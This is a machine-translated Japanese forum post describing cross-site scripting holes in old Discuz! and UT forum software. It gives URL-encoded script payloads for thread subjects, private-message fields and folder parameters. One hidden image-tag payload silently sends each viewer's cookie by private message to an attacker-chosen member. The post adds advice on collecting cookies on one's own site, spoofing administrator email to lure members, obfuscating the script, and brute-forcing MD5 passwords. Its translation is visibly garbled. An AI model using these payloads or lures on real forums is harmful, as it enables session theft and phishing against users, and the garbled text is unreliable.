ディスカスで!投稿、返信、PM などの件名はフィルターされていないため、コードを追加することもできます。
例:
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
その効果は、最初に独自の Cookie をポップアップすることです
使用方法: 上記のコードを画像。
適用バージョン: discuz! 2.x
ディスカッ! 3.x
エクスプロイトについて説明します! 2.0 の脆弱性 Cookie を騙して取得しようとします
XXXFan フォーラムの PM 機能のテストを通じてセキュリティ上の脆弱性が存在します。 具体的な説明は次のとおりです。
XXXFan は次のようにメンバーにクワイエット リンクを送信します (メンバーの名前がXXXFan)
http:/ /XXX/pm.php?action=send&username=XXXFan
フォーラム プログラムはメンバー名をフィルタリングせず、送信列 (TO:) に直接表示するため、スクリプト コードを名前。例:
http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script>
リンクをクリックします上記 将来的に最初に表示されるのは、あなた自身の Cookie コンテンツです。
もちろん、
getcookie.php?cookie= と同様に、Cookie を収集するためのプログラムを最初に独自のサイトに構築することもできます
しかし、単にフォーラムに配置するだけでは、どうやってメンバーにクリックを誘導するのでしょうか?特定する。したがって、discuz フォーラム プログラムのもう 1 つの機能である「友達に投稿」機能を使用することができます。
discuz のこの機能は、入力されたメールアドレスに対してフィルタリング、識別、またはテンプレートを実行しないため、誰でも偽って他の人に手紙を送信することができ、セキュリティは非常に高いです。この機能を利用すると、ExploitFan の管理者を騙ってメンバーにメールを送信させ、メンバーに用意した URL をクリックさせることができます。たとえば、「」と言うことができます。フォーラムは新しい機能をテストしています。上記のアドレスをクリックしてください。バックグラウンドでクリックを記録し、適切なタイミングで報酬としてポイントを追加します。」など。
リンクアドレスはXXXFanのもので、送信元もメールアドレスもXXXFanの公式アドレスなので信憑性は非常に高く、手がかりは残りません。もちろん、セキュリティを高めるために、<script> のコンテンツを暗号化して隠蔽性をさらに高めることができます。 <br/><br/>Cookieの取得方法については、CookieスプーフィングやMD5パスワードのブルートフォースクラッキングを試すことができます。<br/><br/>この方法は、discuz2.0を使用するほとんどのフォーラムに適しています。discuz3.0の使用方法については、に参加してください。以前に公開したのでディスカッションしてください!ウィスパーの脆弱性 <br/>[バグ] 投票バグについて説明します <br/>misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n を使用して URL から直接投票できます <br/> (n は 0 から始まるオプションです) <br/> <br/>しかし、 if n>最大のオプションです、へへ~ <br/>送信はまだ成功していますが、空のタイトルのオプションが追加されています<br/><br/>効果は次のとおりです: <br/>http://discuz.net/viewthread.php?tid=20020&sid= dymPEc <br/> (最後の空白は私が追加したものです) <br/><br/> この脆弱性が存在するバージョン: <br/>Discuz!3. 発見された脆弱性は、最初の発見者 (PK0909) によって開発されました。 <br/><br/>具体的な説明は省略します。簡単なテストコードを示します。 <br/><br/>http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E <br/><br/>上記のコードは独自の Cookie を示しています <br/><br/>以下は比較的有名なフォーラムからのものですテストコード誰がウェブページを閲覧しても、指定されたメンバーの SMS ボックスに Cookie が送信されます。これは非常に隠蔽されています。つまり、誰かがあなたの投稿を引用した場合、ははは、すべてがここに明らかになり、秘密が暴露されます<br/><br/>[img]。 http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open( %22post %22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22% 26msgto= XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22, Forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE% 22、%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] <br/>ディスカッションが見つかりました!クロスドメイン サイトにおける UT スクリプトの脆弱性 - ショート メッセージの章 クロスドメイン サイトにおけるスクリプトの脆弱性は、非常に一般的な脆弱性であると考えられています。 <br/>具体的な情報については、以下を参照してください: <br/>http://www.cert.org/advisories/CA-2000-02.html <br/>以下は、Discuz および UT フォーラム プログラムのプライベート メッセージ部分の説明です<br/><br/>脆弱性への適応バージョン: <br/>Discuz1.X cdiscuz! 2.0 (0609,0820 バージョン) <br/>DISCUZ! 3.x <br/>UT 1.0 <br/><br/> 脆弱性の説明: <br/><br/>DISCUZ!指定したメンバーにプライベート メッセージを送信するには、http://www.XXXX.net/phpbbs/pm.php?action=send&username=name のようなステートメントが使用されますが、名前は短い送信ページに直接表示されます。これは、Cookie の盗難やより深刻な被害の可能性があります。 <br/><br/>Discuz!3.X は、http://XXX.net/pm.php?action=send&uid=XXXX のようなステートメントに変更されており、この脆弱性を回避していますが、SMS フォルダを選択するときにフィルタリングされません。上記の脆弱性も発生します<br/><br/><br/>例<br/>http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie) %3C/script%3E%3Cb%22[/url] <br/>、上記の例は独自の Cookie を表示することです。 (Discuz!1.X Discuz!2.X の場合) <br/><br/>http://XXX.net/pm.php?folder=inbox%22%3E%3...script%3E%3Cb%22 <br/>独自のものを表示クッキー。 (ディスカス向け! 3.例は省略。 (コードは異なる UT フォーラムで異なることが判明していますが、一般的に同様の脆弱性が存在します) <br/><br/><br/> 安全性: 中 弱い <br/><br/> 防止策: <br/> ハイパーリンクをクリックするときは、実際のコンテンツに注意してください。その他のセキュリティ パッチについては、公式フォーラムに注目してください。 <br/> <br/>
<CENTER>
<p style="width:100%;text-align:center;margin:10px 0">
<br />
<br /><p style="width:100%;text-align:center;margin:10px 0"></script>